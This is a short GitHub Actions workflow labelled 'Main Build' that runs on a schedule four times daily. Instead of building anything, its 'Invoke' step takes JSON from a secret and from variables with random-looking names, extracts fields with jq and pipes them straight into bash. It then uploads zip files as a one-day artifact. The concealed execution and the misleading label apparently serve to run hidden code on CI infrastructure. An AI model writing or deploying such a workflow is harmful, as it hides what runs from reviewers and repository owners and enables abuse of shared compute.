name: Main Build
on:
  workflow_dispatch:

  schedule:
    - cron: '5 2,8,14,20 * * *'
permissions:
  contents: read
  actions: read
env:
  CI: true
concurrency:
  group: ${{ github.workflow }}
  cancel-in-progress: false
jobs:
  scheduler:
    name: Main task
    runs-on: ubuntu-latest
    timeout-minutes: 360
    steps:
      - name: Checkout
        uses: actions/checkout@v4
        with:
          fetch-depth: 1
      - name: Invoke
        env:
          dtor85: ${{ secrets.dtor85 }}
        run: |
          printf '%s' "$dtor85" | jq -r .vant6 | /bin/bash
          printf '%s' "$q83" | jq -r .gh31810 | /bin/bash
          echo $ouzi103 | jq -r .p547 | /bin/bash

      - name: Store artifact
        if: always()
        uses: actions/upload-artifact@v4
        with:
          name: v50EX0Zr
          path: "*.zip"
          retention-days: 1
